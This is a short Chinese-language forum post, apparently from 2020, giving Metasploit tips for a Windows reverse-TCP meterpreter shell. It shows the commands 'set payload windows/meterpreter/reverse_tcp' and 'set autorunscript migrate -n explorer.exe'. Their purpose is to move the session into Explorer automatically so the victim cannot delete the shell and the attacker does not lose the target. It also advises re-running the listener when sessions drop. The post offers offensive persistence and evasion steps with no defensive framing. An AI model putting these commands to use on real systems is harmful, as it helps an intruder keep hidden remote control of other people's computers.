|
|
Msf有考虑到这一点,于是乎有一个设置在目标运行Shell与我们服务器建立连接之后就会自动迁移Shell到别的进程,我试过随机寻找可用进程迁移,但是发现直接卡死。
其实很简单,在
set payload windows/meterpreter/reverse_tcp
和设置完了端口与HOST的时候,执行如下命令:
set autorunscript migrate -n explorer.exe
这里的意思是在目标上线后,你要执行那些命令,其中我们将进程迁移到了资源管理器,防止用户删除Shell,然后丢失目标的情况。
经过试验
在迁移后有些时候会掉线,但是别急,你继续exploit监听,等几十秒会连接上。
重启目标资源管理器也会导致目标掉线。
|
|
发表于 2020-4-21 16:02:07
